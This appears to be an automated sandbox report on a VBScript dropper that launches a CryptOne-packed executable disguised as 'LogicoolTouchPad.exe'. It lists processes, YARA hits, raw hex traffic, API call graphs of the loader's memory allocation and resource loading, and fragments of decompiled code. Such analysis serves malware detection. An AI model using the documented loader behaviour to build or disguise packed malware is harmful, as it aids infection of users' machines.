                  2022-06-23 21:14:28 UTC992INData Raw: 63 e4 8b 4e db 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 81 04 0a a5 4b 08 e0 aa 81 55 db 24 cb 04 12 73 f8 eb 2b 95 c8 8b e6 7a c9 cc d7 eb c4 cc cf eb c4 cc 5e 2c e5 81 9f 07 0a 00 8b e0 4b f4 8b a7 08 00 23 5f 09 00 8b 4d 08 8d 0e 5f f4 ff 7c 77 e0 9d 7c d8 f5 83 47 ab 81 45 8f 2e 4c f8 10 62 00 89 0e 4b f4 ff 4c 2e a4 78 47 d8 f5 8d 0e 5f f4 ff 34 76 e0 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 59 37 d8 f5 83 4f a3 e0 51 18 d8 f5 89 0e 43 f4 ff 0c 2c 5c f8 12 32 89 fc fc d7 89 bd 0b db f5 ff 8b 52 03 6a 8b d8 5b c8 12 22 99 fc d4 d7 e1 0c
                  Data Ascii: cNKU$s+z^,K#_M_|w|GE.LbKL.xG_4vY7OQC,\2Rj["
                  2022-06-23 21:14:28 UTC1008INData Raw: 00 77 00 6e 00 03 00 49 00 6e 00 73 00 03 00 44 00 65 00 6c 00 06 00 53 00 68 00 69 00 66 00 74 00 2b 00 05 00 43 00 74 00 72 00 6c 00 2b 00 04 00 41 00 6c 00 74 00 2b 00 20 00 43 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 20 00 64 00 6f 00 65 00 73 00 20 00 6e 00 6f 00 74 00 20 00 73 00 75 00 70 00 70 00 6f 00 72 00 74 00 20 00 49 00 63 00 6f 00 6e 00 73 00 2f 00 4d 00 65 00 6e 00 75 00 20 00 27 00 25 00 73 00 27 00 20 00 69 00 73 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 62 00 65 00 69 00 6e 00 67 00 20 00 75 00 73 00 65 00 64 00 20 00 62 00 79 00 20 00 61 00 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 66 00 6f 00 72 00 6d 00 1f 00 44 00 6f 00 63 00 6b 00 65 00 64 00 20 00 63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 20 00 6d 00 75 00
                  Data Ascii: wnInsDelShift+Ctrl+Alt+ Clipboard does not support Icons/Menu '%s' is already being used by another formDocked control mu


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:23:14:39
                  Start date:23/06/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\graphic.vbs"
                  Imagebase:0x7ff768b40000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:1
                  Start time:23:14:51
                  Start date:23/06/2022
                  Path:C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
                  Imagebase:0x400000
                  File size:1043968 bytes
                  MD5 hash:216BBB6CE29EF16A61B9D5BA4D227300
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Yara matches:
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000001.00000002.330453145.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000001.00000000.283066590.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000001.00000000.283863343.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low

                  Target ID:5
                  Start time:23:14:59
                  Start date:23/06/2022
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 800
                  Imagebase:0xe40000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:27
                  Start time:23:16:36
                  Start date:23/06/2022
                  Path:C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
                  Imagebase:0x400000
                  File size:1043968 bytes
                  MD5 hash:216BBB6CE29EF16A61B9D5BA4D227300
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Yara matches:
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000000.500619017.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000000.503077850.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.524676922.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low

                  Target ID:29
                  Start time:23:16:41
                  Start date:23/06/2022
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 772
                  Imagebase:0xe40000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Reset < >

                    Execution Graph

                    Execution Coverage:3.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:1.8%
                    Total number of Nodes:109
                    Total number of Limit Nodes:4
                    execution_graph 25935 44c66c 25936 44c683 25935->25936 25937 44c6a3 25935->25937 25939 4d0d78 25936->25939 25942 4d07c0 LoadLibraryA 25939->25942 25949 41e1dc 25942->25949 25946 41d9f4 25947 4d0888 VirtualAlloc 25946->25947 25948 4d08c8 25947->25948 25950 41e1e6 25949->25950 25953 41e2a4 FindResourceA 25950->25953 25952 41e214 VirtualAlloc 25952->25946 25954 41e2c9 25953->25954 25954->25952 25955 4539a8 25956 4539bb 25955->25956 25959 44c1e0 25956->25959 25957 4539dc 25960 44c1f6 25959->25960 25961 44c30a 25960->25961 25964 41b48c 25960->25964 25961->25957 25963 44c286 25963->25957 25965 41b4a2 25964->25965 25968 41b3e4 25965->25968 25967 41b4f3 25967->25963 25969 41b40e 25968->25969 25973 41b462 25968->25973 25970 41b3e4 2 API calls 25969->25970 25969->25973 25971 41b426 25970->25971 25974 41b27c 25971->25974 25973->25967 25975 41b28d 25974->25975 25976 41b2f9 25975->25976 25977 41e1dc FindResourceA 25975->25977 25976->25973 25978 41b2bd 25977->25978 25981 41db58 25978->25981 25982 41db74 25981->25982 25985 420394 25982->25985 25984 41b2d8 25984->25973 25986 4203cd 25985->25986 25987 42056c 25986->25987 25989 4253b4 25986->25989 25987->25984 25990 4253ca 25989->25990 25991 4253e3 GetTextExtentPoint32A 25990->25991 25991->25987 25992 42276c 25996 4385a0 25992->25996 25999 452cd8 25992->25999 25993 422782 26003 4387f8 25996->26003 25997 4385cf 25997->25993 26001 452d0e 25999->26001 26002 452d2f 26001->26002 26022 452b8c 26001->26022 26002->25993 26004 43880b 26003->26004 26008 43880d 26003->26008 26005 43887d 26004->26005 26004->26008 26006 435968 KiUserCallbackDispatcher 26005->26006 26009 438886 26006->26009 26008->26009 26010 435968 26008->26010 26009->25997 26011 43597e 26010->26011 26012 435a55 26011->26012 26014 44f3c0 26011->26014 26012->26009 26015 44f3cf 26014->26015 26018 44dde8 26015->26018 26017 44f3e0 26017->26012 26019 44de0c 26018->26019 26020 44df79 KiUserCallbackDispatcher 26019->26020 26021 44decd 26019->26021 26020->26021 26021->26017 26024 452b9f 26022->26024 26023 452bc9 26023->26002 26024->26023 26026 451b48 26024->26026 26027 451b61 26026->26027 26028 451bd1 SystemParametersInfoA 26027->26028 26029 451bf1 26028->26029 26029->26023 26030 43f3dc 26033 42a460 26030->26033 26034 42a490 26033->26034 26035 42a470 26033->26035 26036 42a482 KiUserCallbackDispatcher 26035->26036 26036->26034 26037 43fb0c 26038 43fb26 26037->26038 26040 43fb40 26037->26040 26041 43f8d8 26038->26041 26042 43f8fe GlobalAddAtomA 26041->26042 26044 43f94c 26042->26044 26049 45136c 26044->26049 26048 43f9e8 26048->26040 26050 451376 26049->26050 26061 451728 26050->26061 26052 4513af 26053 451b48 SystemParametersInfoA 26052->26053 26054 43f9d2 26053->26054 26055 452450 26054->26055 26056 45245f 26055->26056 26057 4525b2 CharLowerA 26056->26057 26058 4525d5 26057->26058 26060 4525e6 26058->26060 26065 452758 26058->26065 26060->26048 26062 45173a 26061->26062 26063 451760 LoadCursorA 26062->26063 26064 45177d 26062->26064 26063->26062 26064->26052 26066 452781 26065->26066 26070 4528a5 26065->26070 26066->26070 26074 422794 26066->26074 26068 45279a GetClassInfoA 26069 4527c0 26068->26069 26069->26070 26071 452881 SendMessageA 26069->26071 26070->26060 26072 4533dc 26071->26072 26073 452899 KiUserCallbackDispatcher 26072->26073 26073->26070 26075 4227a4 VirtualAlloc 26074->26075 26076 4227d2 26074->26076 26075->26076 26076->26068

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 814 41e2a4-41e2c7 FindResourceA 815 41e2d0-41e2e1 814->815 816 41e2c9-41e2cf call 41e234 814->816 820 41e2e3-41e2e9 call 41e234 815->820 821 41e2ea-41e30d call 41de48 815->821 816->815 820->821
                    APIs
                    • FindResourceA.KERNEL32(?,?,?,00419B04,?,00000001,00000000,?,0041E214,?,?,?,?,0041B2BD,0000000A), ref: 0041E2BB
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: FindResource
                    • String ID:
                    • API String ID: 1635176832-0
                    • Opcode ID: 37d2375809f074c101ec159dc7c087eeca16e56ff38e1af19beff26740b98322
                    • Instruction ID: e7fca79196f4b9a13c7c0c5f746558b8b00f3a95277a34964b29b902c38106e5
                    • Opcode Fuzzy Hash: 37d2375809f074c101ec159dc7c087eeca16e56ff38e1af19beff26740b98322
                    • Instruction Fuzzy Hash: 82F04BB66052046F9704EE5EE881D9B77ECEE8836431100AEF908DB242DA39DD518779
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 314 4d07c0-4d0800 LoadLibraryA call 41e1dc 317 4d0815-4d08c5 VirtualAlloc call 41d9f4 VirtualAlloc 314->317 318 4d0802-4d0813 314->318 323 4d08c8-4d08ce 317->323 318->317 324 4d08d4-4d0af2 323->324 325 4d0af7-4d0b02 323->325 324->323 326 4d0b08-4d0d2a 325->326 327 4d0d30-4d0d5b 325->327 326->326 326->327
                    APIs
                    • LoadLibraryA.KERNELBASE(004D0D64), ref: 004D07CE
                    • VirtualAlloc.KERNELBASE(00000000,00000065,00001000,00000040), ref: 004D0874
                    • VirtualAlloc.KERNELBASE(00000000,00000065,00001000,00000040), ref: 004D08A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocVirtual$LibraryLoad
                    • String ID: $m@$)$)$)$2$e
                    • API String ID: 2441068224-3348685802
                    • Opcode ID: 5d1ca35d99429fff00d87e1114f2da538d1f53c4dc36e1651b1830a6db695e40
                    • Instruction ID: 8d35841032e7d55d3a383f848f1f4ab3205dd99163327573e316738c413c07c2
                    • Opcode Fuzzy Hash: 5d1ca35d99429fff00d87e1114f2da538d1f53c4dc36e1651b1830a6db695e40
                    • Instruction Fuzzy Hash: 8BF1A7B0D41249DFEB40CFD6E64C7AEBBB1BB04308F60901AD4547E299C3B95A4ACF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 329 452450-45245d 330 452467-45247f call 421704 329->330 331 45245f 329->331 334 452481-452489 330->334 335 45248f-452499 330->335 331->330 334->335 336 4524a9-45258e call 429520 call 4298f0 call 40cf70 335->336 337 45249b-4524a3 335->337 349 452590-452593 336->349 350 45259e-4525ad call 40cf98 336->350 337->336 349->350 353 4525b2-4525dd CharLowerA 350->353 354 4525af 350->354 356 4525e6-452615 call 45449c call 454e60 353->356 357 4525df-4525e1 call 452758 353->357 354->353 363 452617-452623 356->363 364 452626-45262d 356->364 357->356 363->364
                    APIs
                    • CharLowerA.USER32(?,?,?,?,0043F9E8), ref: 004525BA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID: $9B$0PM$8PM$MAINICON$t%M$|%M
                    • API String ID: 1615517891-370378472
                    • Opcode ID: 99926f7a47da97f6f53c3a116efbc3f7f5cd30eb57166722d2f91e5c96eea35d
                    • Instruction ID: ea7b91e38b1c89eade17c0baa2e94f1d2481a26ba6eba72d783132f7ab6197c9
                    • Opcode Fuzzy Hash: 99926f7a47da97f6f53c3a116efbc3f7f5cd30eb57166722d2f91e5c96eea35d
                    • Instruction Fuzzy Hash: D75160706042459FDB00EF29D8C57853BE4AB55308F4441FAEC48DF397D7B99988CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GlobalAddAtomA.KERNEL32(00000000), ref: 0043F92C
                      • Part of subcall function 00452450: CharLowerA.USER32(?,?,?,?,0043F9E8), ref: 004525BA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AtomCharGlobalLower
                    • String ID: $[M$([M$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                    • API String ID: 107674516-3730233899
                    • Opcode ID: 37f512c12520f15ee2aa2069ecf6f16c7b0a53fa03724edcffa3f1721ec24f97
                    • Instruction ID: 3f03f1a0889528010dd100dd3a88f3008b4730d3b04368c11bbb66e9032c8f8d
                    • Opcode Fuzzy Hash: 37f512c12520f15ee2aa2069ecf6f16c7b0a53fa03724edcffa3f1721ec24f97
                    • Instruction Fuzzy Hash: 86412BB0A006459BCB00FFA5E842A5E77E5AB49308B10947BE505E73A2DB3DA904CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 452758-45277b 399 452781-452789 398->399 400 4528e3-4528f8 398->400 399->400 401 45278f-4527be call 422794 GetClassInfoA 399->401 405 4527c0-4527d7 401->405 406 4527fa-452807 401->406 405->406 409 4527d9-4527f5 call 40c178 405->409 410 45280c-45281a 406->410 411 452809 406->411 409->406 415 45281c 410->415 416 45281f-452878 410->416 411->410 415->416 422 4528a5-4528d4 416->422 423 45287a-4528a0 call 4533dc SendMessageA call 4533dc KiUserCallbackDispatcher 416->423 422->400 431 4528d6-4528dd 422->431 423->422 431->400
                    APIs
                      • Part of subcall function 00422794: VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 004227B2
                    • GetClassInfoA.USER32(004D5668,@$E,?,00000000,004528F9,?,0044A840), ref: 004527B7
                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000,?,0044A840), ref: 0045288D
                    • KiUserCallbackDispatcher.NTDLL(0000000E,000000F2,00000000,?,0044A840), ref: 004528A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocCallbackClassDispatcherInfoMessageSendUserVirtual
                    • String ID: @$E$LPM
                    • API String ID: 3599747300-827266730
                    • Opcode ID: 1af6389c14136e65695fcbdb912b1f3b0a7788cc06f76e160dea2d720c98afe1
                    • Instruction ID: f320e30c47b631510f9e5cc36092094f8708a6830a53161fff9a9aee9730d1e5
                    • Opcode Fuzzy Hash: 1af6389c14136e65695fcbdb912b1f3b0a7788cc06f76e160dea2d720c98afe1
                    • Instruction Fuzzy Hash: CE4130707442406FE710EFA9DD82F6637A8AB45704F54457BFD40EB2E3DAB9A844872C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 482 42a460-42a46e 483 42a490-42a49b 482->483 484 42a470-42a48e call 42a378 KiUserCallbackDispatcher 482->484 486 42a4af-42a4b1 483->486 487 42a49d 483->487 495 42a4c7-42a4c9 484->495 490 42a4bc-42a4bf 486->490 488 42a4b3-42a4b5 487->488 489 42a49f-42a4a0 487->489 488->490 492 42a4a2-42a4a6 489->492 493 42a4b7 489->493 494 42a4c1 490->494 490->495 492->490 496 42a4a8-42a4ad 492->496 493->490 494->495 496->490
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?), ref: 0042A488
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID: GetSystemMetrics
                    • API String ID: 2492992576-96882338
                    • Opcode ID: 86433630f87f6f9e26947894bf362137cb0d39e826c61aaf64f1471468175a8e
                    • Instruction ID: f45f04def38af41af64cbd46ec1b311c667da632064cbf9fbc218da1d6088580
                    • Opcode Fuzzy Hash: 86433630f87f6f9e26947894bf362137cb0d39e826c61aaf64f1471468175a8e
                    • Instruction Fuzzy Hash: 24F0C230B096104BC6107634BCCC6263686974A330FD08F27AD25493D1C5BCD97A520F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 709 44dde8-44de0a 710 44de7c-44de84 709->710 711 44de0c-44de19 call 451618 709->711 712 44de86-44de88 call 447920 710->712 713 44de8d-44de91 710->713 711->710 719 44de1b-44de1f 711->719 712->713 717 44de93-44de95 713->717 718 44de9d 713->718 720 44de97-44de9b 717->720 721 44de9f-44dea7 717->721 718->721 722 44de21-44de33 call 451604 719->722 720->718 720->721 723 44deb2-44deb4 721->723 724 44dea9-44dead call 4217d4 721->724 733 44de35-44de43 call 451604 722->733 734 44de76-44de7a 722->734 727 44df65-44df6e call 43b044 723->727 728 44deba-44debe 723->728 724->723 738 44df70-44df7a call 43ade4 KiUserCallbackDispatcher 727->738 739 44df7f-44df86 727->739 730 44dec0-44dec7 728->730 731 44decd-44ded7 728->731 730->727 730->731 735 44dee2-44dee6 731->735 736 44ded9-44dee0 731->736 733->734 754 44de45-44de71 call 40c1b4 733->754 734->710 734->722 741 44dee8-44def1 call 43b044 735->741 742 44df40-44df47 735->742 736->735 736->741 738->739 745 44df91-44dfad call 44dd20 739->745 746 44df88-44df8c call 44eeac 739->746 741->739 755 44def7-44df13 call 43ade4 741->755 742->739 747 44df49-44df52 call 43b044 742->747 746->745 747->739 758 44df54-44df63 call 43ade4 747->758 754->734 770 44df15-44df28 call 43ade4 755->770 771 44df2e-44df3e call 43ade4 call 447920 755->771 758->739 770->771 771->739
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,0044DFAE), ref: 0044DF7A
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: 363e831c1641a26c8a9c58432b9f765c1c5ce59dd3389193c7bd383a65cb89b3
                    • Instruction ID: 4e3f4791494385b395d3e2600b5f11623e9fa6e8d2110f1a1db2ab8065cdd3a1
                    • Opcode Fuzzy Hash: 363e831c1641a26c8a9c58432b9f765c1c5ce59dd3389193c7bd383a65cb89b3
                    • Instruction Fuzzy Hash: 7851BF70E006005BEB60EF2AC88579A77A59F64308F1844BBBC459F3A7CA3CDC498B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 779 451b48-451b5f 780 451b61-451b6c 779->780 781 451b6f-451b84 779->781 780->781 782 451b86-451b8d call 454038 781->782 783 451b92-451ba3 781->783 782->783 786 451ba5-451ba8 783->786 787 451bbd-451bcc call 4248fc 783->787 789 451bae-451bbb call 4248fc 786->789 793 451bd1-451bef SystemParametersInfoA 787->793 789->793 794 451c25-451c44 call 4249e0 call 4248fc 793->794 795 451bf1-451c23 call 4248fc * 2 793->795 803 451c49-451c7d call 424740 * 2 794->803 795->803 811 451c8c 803->811 812 451c7f-451c87 call 454038 803->812 812->811
                    APIs
                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00451BE8
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: InfoParametersSystem
                    • String ID:
                    • API String ID: 3098949447-0
                    • Opcode ID: f9866d348665206b83f32f49bbbd435cbdb9ecea935e03ecfe8fd9fcad8f4ec3
                    • Instruction ID: 5993d972940aec6fb307cc78d4a6f19bd85111af0e41e0a8ec639e155efabc24
                    • Opcode Fuzzy Hash: f9866d348665206b83f32f49bbbd435cbdb9ecea935e03ecfe8fd9fcad8f4ec3
                    • Instruction Fuzzy Hash: 6F31B434704244ABE710FB69DC42B9A33E5BB44304F4140B7BD08DB2A7DEB8A909C72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 828 451728-451742 830 451747-45174a 828->830 831 451751-451754 830->831 832 45174c-45174f 830->832 833 451756-45175c 831->833 834 45175e 831->834 832->831 832->833 835 451760-45177b LoadCursorA call 4517e0 833->835 834->835 835->830 838 45177d-451781 835->838
                    APIs
                    • LoadCursorA.USER32(00000000,00000000,?,?,?,0044A768,004513AF,?,?,00000000,?,0043F9D2), ref: 00451764
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CursorLoad
                    • String ID:
                    • API String ID: 3238433803-0
                    • Opcode ID: 424c217fda72ae87e93cba9b36545e1173e55a5b0716aad7e59c5948895de161
                    • Instruction ID: 01bbe981f386afef1924bbb56251639ee72f7836fc1a3dbaa2450e4d7e9bf1ab
                    • Opcode Fuzzy Hash: 424c217fda72ae87e93cba9b36545e1173e55a5b0716aad7e59c5948895de161
                    • Instruction Fuzzy Hash: 8DF08921B04104179620257D5CC1B2A72849B85736F21037BFD3AC63E2C7395C49815D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 839 4253b4-4253f0 call 42566c GetTextExtentPoint32A
                    APIs
                    • GetTextExtentPoint32A.GDI32(?,00000000,?,?,?,?,0042540C), ref: 004253E8
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: ExtentPoint32Text
                    • String ID:
                    • API String ID: 223599850-0
                    • Opcode ID: a304844cc6d7a831491cc87d84eeb58497e05e002272473859f61d3049febff2
                    • Instruction ID: a5b968425a3a8d1d7692738480fa707cd01a6e3877afbcfd67fac92e63d24ae0
                    • Opcode Fuzzy Hash: a304844cc6d7a831491cc87d84eeb58497e05e002272473859f61d3049febff2
                    • Instruction Fuzzy Hash: 63E0ECE63016105BC391FFBE9C81A6BAADD9ECD264309887FB58DD7352E5B8CC014768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 004227B2
                    Memory Dump Source
                    • Source File: 00000001.00000002.329041248.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 432943f2fc16d2ad08087765657fa86938ba548e6a605329295f2dc310678a93
                    • Instruction ID: 5098daf06d22fde4b2b0a8b5ef3d290ffb6e58937c7bca4746b9f95684989b0b
                    • Opcode Fuzzy Hash: 432943f2fc16d2ad08087765657fa86938ba548e6a605329295f2dc310678a93
                    • Instruction Fuzzy Hash: A11136743047169FC710EF19E980B42BBE4EB98390B14C53BE9589B385D7B8E9109BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E00403614(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a584) {
                    				void* _v0;
                    				void* _v4;
                    				void* _v24;
                    				void* _v28;
                    				void* _v44;
                    				void* _v48;
                    				void* _v64;
                    				void* _v72;
                    				void* _v76;
                    				void* _v80;
                    				void* _t60;
                    				void* _t73;
                    				void* _t74;
                    
                    				_t74 = __esi;
                    				_t73 = __edi;
                    				_t60 = __ebx;
                    				asm("repe jl 0x82");
                    				asm("sbb eax, 0xe3255a62");
                    			}
















                    0x00403614
                    0x00403614
                    0x00403614
                    0x00403615
                    0x00403618

                    Memory Dump Source
                    • Source File: 00000001.00000002.329034065.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dc0f0323f284f7f25937e02f7ec02137921f613abea7a369f82f210be5d8508
                    • Instruction ID: f0cf91e2c5ed039c05bcd93b3431d43edfe09bcfde1b7e1a9bf3de9dea03c2c8
                    • Opcode Fuzzy Hash: 5dc0f0323f284f7f25937e02f7ec02137921f613abea7a369f82f210be5d8508
                    • Instruction Fuzzy Hash: 2D51BFB0648301AFE320CF64DC46B5ABFE9EF84B05F10891DF588AB2C0D779A645CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 31%
                    			E00403683(signed int __eax, void* __esi, intOrPtr* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, char _a32, char _a36, intOrPtr _a572) {
                    				char _v0;
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				intOrPtr* _v12;
                    				intOrPtr* _v16;
                    				char _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v76;
                    				intOrPtr _v84;
                    				intOrPtr _v88;
                    				intOrPtr _v92;
                    				intOrPtr* _t36;
                    				intOrPtr* _t38;
                    				intOrPtr* _t40;
                    				intOrPtr* _t43;
                    				intOrPtr _t44;
                    				intOrPtr _t50;
                    				void* _t57;
                    				char* _t60;
                    				intOrPtr* _t61;
                    
                    				_t35 = __eax;
                    				asm("out 0x6c, al");
                    				 *__eax =  *__eax + 0x53;
                    				 *0xd85fdda6 = __eax;
                    				if( *__eax != 0) {
                    					 *(__esi - 0x7f) =  !( *(__esi - 0x7f));
                    					asm("in al, dx");
                    					 *(__eax ^ 0x00000002) =  *(__eax ^ 0x00000002) + (__eax ^ 0x00000002);
                    					_a8 = 0;
                    					_v0 = 0;
                    					_a12 = 0;
                    					_a16 = _a572;
                    					_v4 =  *0x40bcb1(0, 0);
